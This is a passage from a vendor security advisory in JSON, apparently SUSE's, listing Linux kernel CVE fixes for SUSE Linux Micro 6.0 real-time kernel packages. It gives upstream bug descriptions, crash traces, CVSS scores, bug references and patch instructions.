"url": "https://www.suse.com/security/cve/CVE-2023-54219"
},
{
"category": "external",
"summary": "SUSE Bug 1256231 for CVE-2023-54219",
"url": "https://bugzilla.suse.com/1256231"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54219"
},
{
"cve": "CVE-2023-54220",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54220"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: 8250: Fix oops for port-\u003epm on uart_change_pm()\n\nUnloading a hardware specific 8250 driver can produce error \"Unable to\nhandle kernel paging request at virtual address\" about ten seconds after\nunloading the driver. This happens on uart_hangup() calling\nuart_change_pm().\n\nTurns out commit 04e82793f068 (\"serial: 8250: Reinit port-\u003epm on port\nspecific driver unbind\") was only a partial fix. If the hardware specific\ndriver has initialized port-\u003epm function, we need to clear port-\u003epm too.\nJust reinitializing port-\u003eops does not do this. Otherwise serial8250_pm()\nwill call port-\u003epm() instead of serial8250_do_pm().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54220",
"url": "https://www.suse.com/security/cve/CVE-2023-54220"
},
{
"category": "external",
"summary": "SUSE Bug 1255949 for CVE-2023-54220",
"url": "https://bugzilla.suse.com/1255949"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54220"
},
{
"cve": "CVE-2023-54221",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54221"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: imx93: fix memory leak and missing unwind goto in imx93_clocks_probe\n\nIn function probe(), it returns directly without unregistered hws\nwhen error occurs.\n\nFix this by adding \u0027goto unregister_hws;\u0027 on line 295 and\nline 310.\n\nUse devm_kzalloc() instead of kzalloc() to automatically\nfree the memory using devm_kfree() when error occurs.\n\nReplace of_iomap() with devm_of_iomap() to automatically\nhandle the unused ioremap region and delete \u0027iounmap(anatop_base);\u0027\nin unregister_hws.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54221",
"url": "https://www.suse.com/security/cve/CVE-2023-54221"
},
{
"category": "external",
"summary": "SUSE Bug 1255842 for CVE-2023-54221",
"url": "https://bugzilla.suse.com/1255842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-54221"
},
{
"cve": "CVE-2023-54223",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54223"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: xsk: Fix invalid buffer access for legacy rq\n\nThe below crash can be encountered when using xdpsock in rx mode for\nlegacy rq: the buffer gets released in the XDP_REDIRECT path, and then\nonce again in the driver. This fix sets the flag to avoid releasing on\nthe driver side.\n\nXSK handling of buffers for legacy rq was relying on the caller to set\nthe skip release flag. But the referenced fix started using fragment\ncounts for pages instead of the skip flag.\n\nCrash log:\n general protection fault, probably for non-canonical address 0xffff8881217e3a: 0000 [#1] SMP\n CPU: 0 PID: 14 Comm: ksoftirqd/0 Not tainted 6.5.0-rc1+ #31\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:bpf_prog_03b13f331978c78c+0xf/0x28\n Code: ...\n RSP: 0018:ffff88810082fc98 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888138404901 RCX: c0ffffc900027cbc\n RDX: ffffffffa000b514 RSI: 00ffff8881217e32 RDI: ffff888138404901\n RBP: ffff88810082fc98 R08: 0000000000091100 R09: 0000000000000006\n R10: 0000000000000800 R11: 0000000000000800 R12: ffffc9000027a000\n R13: ffff8881217e2dc0 R14: ffff8881217e2910 R15: ffff8881217e2f00\n FS: 0000000000000000(0000) GS:ffff88852c800000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000564cb2e2cde0 CR3: 000000010e603004 CR4: 0000000000370eb0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x32/0x80\n ? exc_general_protection+0x192/0x390\n ? asm_exc_general_protection+0x22/0x30\n ? 0xffffffffa000b514\n ? bpf_prog_03b13f331978c78c+0xf/0x28\n mlx5e_xdp_handle+0x48/0x670 [mlx5_core]\n ? dev_gro_receive+0x3b5/0x6e0\n mlx5e_xsk_skb_from_cqe_linear+0x6e/0x90 [mlx5_core]\n mlx5e_handle_rx_cqe+0x55/0x100 [mlx5_core]\n mlx5e_poll_rx_cq+0x87/0x6e0 [mlx5_core]\n mlx5e_napi_poll+0x45e/0x6b0 [mlx5_core]\n __napi_poll+0x25/0x1a0\n net_rx_action+0x28a/0x300\n __do_softirq+0xcd/0x279\n ? sort_range+0x20/0x20\n run_ksoftirqd+0x1a/0x20\n smpboot_thread_fn+0xa2/0x130\n kthread+0xc9/0xf0\n ? kthread_complete_and_exit+0x20/0x20\n ret_from_fork+0x1f/0x30\n \u003c/TASK\u003e\n Modules linked in: mlx5_ib mlx5_core rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_iscsi ib_umad rdma_cm ib_ipoib iw_cm ib_cm ib_uverbs ib_core xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xt_addrtype iptable_nat nf_nat br_netfilter overlay zram zsmalloc fuse [last unloaded: mlx5_core]\n ---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54223",
"url": "https://www.suse.com/security/cve/CVE-2023-54223"
},
{
"category": "external",
"summary": "SUSE Bug 1256233 for CVE-2023-54223",
"url": "https://bugzilla.suse.com/1256233"
},
{
"category": "external",
"summary": "SUSE Bug 1256253 for CVE-2023-54223",
"url": "https://bugzilla.suse.com/1256253"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54223"
},
{
"cve": "CVE-2023-54224",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54224"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix lockdep splat and potential deadlock after failure running delayed items\n\nWhen running delayed items we are holding a delayed node\u0027s mutex and then\nwe will attempt to modify a subvolume btree to insert/update/delete the\ndelayed items. However if have an error during the insertions for example,\nbtrfs_insert_delayed_items() may return with a path that has locked extent\nbuffers (a leaf at the very least), and then we attempt to release the\ndelayed node at __btrfs_run_delayed_items(), which requires taking the\ndelayed node\u0027s mutex, causing an ABBA type of deadlock. This was reported\nby syzbot and the lockdep splat is the following:\n\n WARNING: possible circular locking dependency detected\n 6.5.0-rc7-syzkaller-00024-g93f5de5f648d #0 Not tainted\n ------------------------------------------------------\n syz-executor.2/13257 is trying to acquire lock:\n ffff88801835c0c0 (\u0026delayed_node-\u003emutex){+.+.}-{3:3}, at: __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256\n\n but task is already holding lock:\n ffff88802a5ab8e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_lock+0x3c/0x2a0 fs/btrfs/locking.c:198\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #1 (btrfs-tree-00){++++}-{3:3}:\n __lock_release kernel/locking/lockdep.c:5475 [inline]\n lock_release+0x36f/0x9d0 kernel/locking/lockdep.c:5781\n up_write+0x79/0x580 kernel/locking/rwsem.c:1625\n btrfs_tree_unlock_rw fs/btrfs/locking.h:189 [inline]\n btrfs_unlock_up_safe+0x179/0x3b0 fs/btrfs/locking.c:239\n search_leaf fs/btrfs/ctree.c:1986 [inline]\n btrfs_search_slot+0x2511/0x2f80 fs/btrfs/ctree.c:2230\n btrfs_insert_empty_items+0x9c/0x180 fs/btrfs/ctree.c:4376\n btrfs_insert_delayed_item fs/btrfs/delayed-inode.c:746 [inline]\n btrfs_insert_delayed_items fs/btrfs/delayed-inode.c:824 [inline]\n __btrfs_commit_inode_delayed_items+0xd24/0x2410 fs/btrfs/delayed-inode.c:1111\n __btrfs_run_delayed_items+0x1db/0x430 fs/btrfs/delayed-inode.c:1153\n flush_space+0x269/0xe70 fs/btrfs/space-info.c:723\n btrfs_async_reclaim_metadata_space+0x106/0x350 fs/btrfs/space-info.c:1078\n process_one_work+0x92c/0x12c0 kernel/workqueue.c:2600\n worker_thread+0xa63/0x1210 kernel/workqueue.c:2751\n kthread+0x2b8/0x350 kernel/kthread.c:389\n ret_from_fork+0x2e/0x60 arch/x86/kernel/process.c:145\n ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304\n\n -\u003e #0 (\u0026delayed_node-\u003emutex){+.+.}-{3:3}:\n check_prev_add kernel/locking/lockdep.c:3142 [inline]\n check_prevs_add kernel/locking/lockdep.c:3261 [inline]\n validate_chain kernel/locking/lockdep.c:3876 [inline]\n __lock_acquire+0x39ff/0x7f70 kernel/locking/lockdep.c:5144\n lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761\n __mutex_lock_common+0x1d8/0x2530 kernel/locking/mutex.c:603\n __mutex_lock kernel/locking/mutex.c:747 [inline]\n mutex_lock_nested+0x1b/0x20 kernel/locking/mutex.c:799\n __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256\n btrfs_release_delayed_node fs/btrfs/delayed-inode.c:281 [inline]\n __btrfs_run_delayed_items+0x2b5/0x430 fs/btrfs/delayed-inode.c:1156\n btrfs_commit_transaction+0x859/0x2ff0 fs/btrfs/transaction.c:2276\n btrfs_sync_file+0xf56/0x1330 fs/btrfs/file.c:1988\n vfs_fsync_range fs/sync.c:188 [inline]\n vfs_fsync fs/sync.c:202 [inline]\n do_fsync fs/sync.c:212 [inline]\n __do_sys_fsync fs/sync.c:220 [inline]\n __se_sys_fsync fs/sync.c:218 [inline]\n __x64_sys_fsync+0x196/0x1e0 fs/sync.c:218\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n other info that\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54224",
"url": "https://www.suse.com/security/cve/CVE-2023-54224"
},
{
"category": "external",
"summary": "SUSE Bug 1255951 for CVE-2023-54224",
"url": "https://bugzilla.suse.com/1255951"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54224"
},
{
"cve": "CVE-2023-54225",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54225"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipa: only reset hashed tables when supported\n\nLast year, the code that manages GSI channel transactions switched\nfrom using spinlock-protected linked lists to using indexes into the\nring buffer used for a channel. Recently, Google reported seeing\ntransaction reference count underflows occasionally during shutdown.\n\nDoug Anderson found a way to reproduce the issue reliably, and\nbisected the issue to the commit that eliminated the linked lists\nand the lock. The root cause was ultimately determined to be\nrelated to unused transactions being committed as part of the modem\nshutdown cleanup activity. Unused transactions are not normally\nexpected (except in error cases).\n\nThe modem uses some ranges of IPA-resident memory, and whenever it\nshuts down we zero those ranges. In ipa_filter_reset_table() a\ntransaction is allocated to zero modem filter table entries. If\nhashing is not supported, hashed table memory should not be zeroed.\nBut currently nothing prevents that, and the result is an unused\ntransaction. Something similar occurs when we zero routing table\nentries for the modem.\n\nBy preventing any attempt to clear hashed tables when hashing is not\nsupported, the reference count underflow is avoided in this case.\n\nNote that there likely remains an issue with properly freeing unused\ntransactions (if they occur due to errors). This patch addresses\nonly the underflows that Google originally reported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54225",
"url": "https://www.suse.com/security/cve/CVE-2023-54225"
},
{
"category": "external",
"summary": "SUSE Bug 1256234 for CVE-2023-54225",
"url": "https://bugzilla.suse.com/1256234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54225"
},
{
"cve": "CVE-2023-54227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-mq: fix tags leak when shrink nr_hw_queues\n\nAlthough we don\u0027t need to realloc set-\u003etags[] when shrink nr_hw_queues,\nwe need to free them. Or these tags will be leaked.\n\nHow to reproduce:\n1. mount -t configfs configfs /mnt\n2. modprobe null_blk nr_devices=0 submit_queues=8\n3. mkdir /mnt/nullb/nullb0\n4. echo 1 \u003e /mnt/nullb/nullb0/power\n5. echo 4 \u003e /mnt/nullb/nullb0/submit_queues\n6. rmdir /mnt/nullb/nullb0\n\nIn step 4, will alloc 9 tags (8 submit queues and 1 poll queue), then\nin step 5, new_nr_hw_queues = 5 (4 submit queues and 1 poll queue).\nAt last in step 6, only these 5 tags are freed, the other 4 tags leaked.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54227",
"url": "https://www.suse.com/security/cve/CVE-2023-54227"
},
{
"category": "external",
"summary": "SUSE Bug 1255952 for CVE-2023-54227",
"url": "https://bugzilla.suse.com/1255952"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54227"
},
{
"cve": "CVE-2023-54229",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54229"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: fix registration of 6Ghz-only phy without the full channel range\n\nBecause of what seems to be a typo, a 6Ghz-only phy for which the BDF\ndoes not allow the 7115Mhz channel will fail to register:\n\n WARNING: CPU: 2 PID: 106 at net/wireless/core.c:907 wiphy_register+0x914/0x954\n Modules linked in: ath11k_pci sbsa_gwdt\n CPU: 2 PID: 106 Comm: kworker/u8:5 Not tainted 6.3.0-rc7-next-20230418-00549-g1e096a17625a-dirty #9\n Hardware name: Freebox V7R Board (DT)\n Workqueue: ath11k_qmi_driver_event ath11k_qmi_driver_event_work\n pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : wiphy_register+0x914/0x954\n lr : ieee80211_register_hw+0x67c/0xc10\n sp : ffffff800b123aa0\n x29: ffffff800b123aa0 x28: 0000000000000000 x27: 0000000000000000\n x26: 0000000000000000 x25: 0000000000000006 x24: ffffffc008d51418\n x23: ffffffc008cb0838 x22: ffffff80176c2460 x21: 0000000000000168\n x20: ffffff80176c0000 x19: ffffff80176c03e0 x18: 0000000000000014\n x17: 00000000cbef338c x16: 00000000d2a26f21 x15: 00000000ad6bb85f\n x14: 0000000000000020 x13: 0000000000000020 x12: 00000000ffffffbd\n x11: 0000000000000208 x10: 00000000fffffdf7 x9 : ffffffc009394718\n x8 : ffffff80176c0528 x7 : 000000007fffffff x6 : 0000000000000006\n x5 : 0000000000000005 x4 : ffffff800b304284 x3 : ffffff800b304284\n x2 : ffffff800b304d98 x1 : 0000000000000000 x0 : 0000000000000000\n Call trace:\n wiphy_register+0x914/0x954\n ieee80211_register_hw+0x67c/0xc10\n ath11k_mac_register+0x7c4/0xe10\n ath11k_core_qmi_firmware_ready+0x1f4/0x570\n ath11k_qmi_driver_event_work+0x198/0x590\n process_one_work+0x1b8/0x328\n worker_thread+0x6c/0x414\n kthread+0x100/0x104\n ret_from_fork+0x10/0x20\n ---[ end trace 0000000000000000 ]---\n ath11k_pci 0002:01:00.0: ieee80211 registration failed: -22\n ath11k_pci 0002:01:00.0: failed register the radio with mac80211: -22\n ath11k_pci 0002:01:00.0: failed to create pdev core: -22",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54229",
"url": "https://www.suse.com/security/cve/CVE-2023-54229"
},
{
"category": "external",
"summary": "SUSE Bug 1255924 for CVE-2023-54229",
"url": "https://bugzilla.suse.com/1255924"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54229"
},
{
"cve": "CVE-2023-54230",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54230"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namba: bus: fix refcount leak\n\ncommit 5de1540b7bc4 (\"drivers/amba: create devices from device tree\")\nincreases the refcount of of_node, but not releases it in\namba_device_release, so there is refcount leak. By using of_node_put\nto avoid refcount leak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54230",
"url": "https://www.suse.com/security/cve/CVE-2023-54230"
},
{
"category": "external",
"summary": "SUSE Bug 1255925 for CVE-2023-54230",
"url": "https://bugzilla.suse.com/1255925"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
